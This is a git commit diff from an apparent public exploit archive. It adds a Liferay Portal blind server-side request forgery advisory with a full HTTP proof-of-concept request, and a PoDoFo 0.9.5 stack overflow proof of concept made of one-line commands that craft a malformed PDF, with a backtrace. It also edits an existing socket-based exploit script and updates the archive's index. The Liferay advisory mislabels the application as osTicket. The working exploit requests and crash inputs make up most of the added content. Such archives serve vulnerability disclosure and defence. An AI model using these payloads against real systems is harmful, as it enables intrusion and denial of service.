DB: 2018-06-27

3 changes to exploits/shellcodes PoDoFo 0.9.5 - Buffer Overflow Liferay Portal < 7.0.4 - Server-Side Request Forgery
2018-06-27 05:01:48 +00:00 · 2018-06-27 05:01:48 +00:00 · 2c912f897c
commit 2c912f897c
parent d8206fb5eb
4 changed files with 158 additions and 6 deletions
--- a/exploits/hardware/webapps/44864.py
+++ b/exploits/hardware/webapps/44864.py
@ -27,5 +27,6 @@ s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.connect((sys.argv[1],81))
 s.send('POST /login.htm HTTP/1.1\r\n')
 s.send('command=login&username=' + payload + '&password=PoC\r\n\r\n')
+s.recv(1024)
 s.close()
 print "\nExploit complete!"
--- a/exploits/java/webapps/44945.txt
+++ b/exploits/java/webapps/44945.txt
@ -0,0 +1,83 @@
+1. ADVISORY INFORMATION
+
+========================================
+
+Title: Liferay Portal < 7.0.4 Blind Server-Side Request Forgery
+
+Application: osTicket
+
+Remotely Exploitable: Yes
+
+Authentication Required: NO
+
+Versions Affected: <= 7.0.4
+
+Technology: Java
+
+Vendor URL: liferay.com
+
+Date of found: 04 December 2017
+
+Disclosure: 25 June 2018
+
+Author: Mehmet Ince
+
+
+
+2. CREDIT
+
+========================================
+
+This vulnerability was identified during penetration test
+
+by Mehmet INCE from PRODAFT / INVICTUS
+
+
+
+3. Technical Details & POC
+
+========================================
+
+POST /xmlrpc/pingback HTTP/1.1
+
+Host: mehmetince.dev:8080
+
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML,
+like Gecko) Chrome/47.0.2526.73 Safari/537.36
+
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+
+Accept-Language: en-US,en;q=0.5
+
+Accept-Encoding: gzip, deflate
+
+Connection: close
+
+Upgrade-Insecure-Requests: 1
+
+Content-Length: 361
+
+
+<?xml version="1.0" encoding="UTF-8"?>
+
+<methodCall>
+
+<methodName>pingback.ping</methodName>
+
+<params>
+
+<param>
+
+<value>http://TARGET/</value>
+
+</param>
+
+<param>
+
+<value>http://mehmetince.dev:8080/web/guest/home/-/blogs/30686</value>
+
+</param>
+
+</params>
+
+</methodCall>
--- a/exploits/linux/dos/44946.txt
+++ b/exploits/linux/dos/44946.txt
@ -0,0 +1,66 @@
+# Exploit Title: PoDoFo 0.9.5 - Stack-Based Buffer Overflow (PoC)
+# Date: 25.06.2018
+# Software Link: https://sourceforge.net/projects/podofo/
+# Vuln Version: 0.9.5
+# CVE: cve-2018-8002
+# Vulnerability Details:  https://bugzilla.redhat.com/show_bug.cgi?id=1548930
+# Exploit Author: r4xis
+https://github.com/r4xis
+
+
+
+exploit
+-------------
+podofo 0.9.3 (tested on ubuntu 16.04 32 bit)
+$ python -c 'print "%PDF- 1 0 obj<<" + "["*50000' > poc.pdf;podofopdfinfo poc.pdf
+
+podofo 0.9.4 (tested on debian 9.4 64 bit)
+$ python -c 'print "%PDF- 1 0 obj" + "["*50000 + "startxref 5%%EOF"' > poc.pdf ;podofopdfinfo poc.pdf
+
+podofo 0.9.5 (tested on ubuntu 18.04 64 bit)
+$ python -c 'print "%PDF- 1 0 obj" + "["*50000 + "startxref 5%%EOF"' > poc.pdf ;podofopdfinfo poc.pdf
+
+Note: Also you can use "<<" characters;
+$ python -c 'print "%PDF- 1 0 obj" + "<<"*50000 + "startxref 5%%EOF"' > poc.pdf ;podofopdfinfo poc.pdf
+
+reason
+-----------
+Recursive functions call to each others, until the stack overflow.
+
+backtrace 
+-----------
+for "[" chars;
+...
+#28 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
+#29 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
+   from /usr/lib/libpodofo.so.0.9.5
+#30 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
+#31 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
+   from /usr/lib/libpodofo.so.0.9.5
+#32 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
+#33 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
+   from /usr/lib/libpodofo.so.0.9.5
+#34 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
+#35 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
+   from /usr/lib/libpodofo.so.0.9.5
+#36 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
+#37 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
+   from /usr/lib/libpodofo.so.0.9.5
+#38 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
+#39 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
+   from /usr/lib/libpodofo.so.0.9.5
+#40 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
+#41 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
+   from /usr/lib/libpodofo.so.0.9.5
+#42 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
+#43 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
+   from /usr/lib/libpodofo.so.0.9.5
+#44 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
+#45 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
+   from /usr/lib/libpodofo.so.0.9.5
+#46 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
+#47 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
+   from /usr/lib/libpodofo.so.0.9.5
+#48 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
+#49 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
+...
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -5988,6 +5988,7 @@ id,file,description,date,author,type,platform,port
 44821,exploits/multiple/dos/44821.txt,"Epiphany 3.28.2.1 - Denial of Service",2018-06-01,"Dhiraj Mishra",dos,multiple,
 44832,exploits/linux/dos/44832.txt,"Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption",2018-06-05,"Google Security Research",dos,linux,
 44944,exploits/linux/dos/44944.txt,"KVM (Nested Virtualization) - L1 Guest Privilege Escalation",2018-06-25,"Google Security Research",dos,linux,
+44946,exploits/linux/dos/44946.txt,"PoDoFo 0.9.5 - Buffer Overflow",2018-06-26,r4xis,dos,linux,
 44846,exploits/php/dos/44846.txt,"PHP 7.2.2 - 'php_stream_url_wrap_http_ex' Buffer Overflow",2018-06-06,"Wei Lei and Liu Yang",dos,php,
 44847,exploits/macos/dos/44847.c,"Apple macOS Kernel - Use-After-Free Due to Lack of Locking in nvidia GeForce Driver",2018-06-06,"Google Security Research",dos,macos,
 44848,exploits/multiple/dos/44848.c,"Apple macOS/iOS Kernel - Heap Overflow Due to Lack of Lower Size Check in getvolattrlist",2018-06-06,"Google Security Research",dos,multiple,
@ -39544,6 +39545,7 @@ id,file,description,date,author,type,platform,port
 44839,exploits/hardware/webapps/44839.md,"Brother HL Series Printers 1.15 - Cross-Site Scripting",2018-06-04,"Huy Kha",webapps,hardware,
 44843,exploits/linux/webapps/44843.py,"Jenkins Mailer Plugin < 1.20 - Cross-Site Request Forgery (Send Email)",2018-06-05,Kl3_GMjq6,webapps,linux,
 44943,exploits/php/webapps/44943.txt,"WordPress Plugin iThemes Security < 7.0.3 - SQL Injection",2018-06-25,"Çlirim Emini",webapps,php,80
+44945,exploits/java/webapps/44945.txt,"Liferay Portal < 7.0.4 - Server-Side Request Forgery",2018-06-26,"Mehmet Ince",webapps,java,80
 44851,exploits/php/webapps/44851.txt,"WampServer 3.0.6 - Cross-Site Request Forgery",2018-06-07,L0RD,webapps,php,
 44853,exploits/php/webapps/44853.txt,"WordPress Form Maker Plugin 1.12.24 - SQL Injection",2018-06-07,defensecode,webapps,php,
 44854,exploits/php/webapps/44854.txt,"WordPress Contact Form Maker Plugin 1.12.20 - SQL Injection",2018-06-07,defensecode,webapps,php,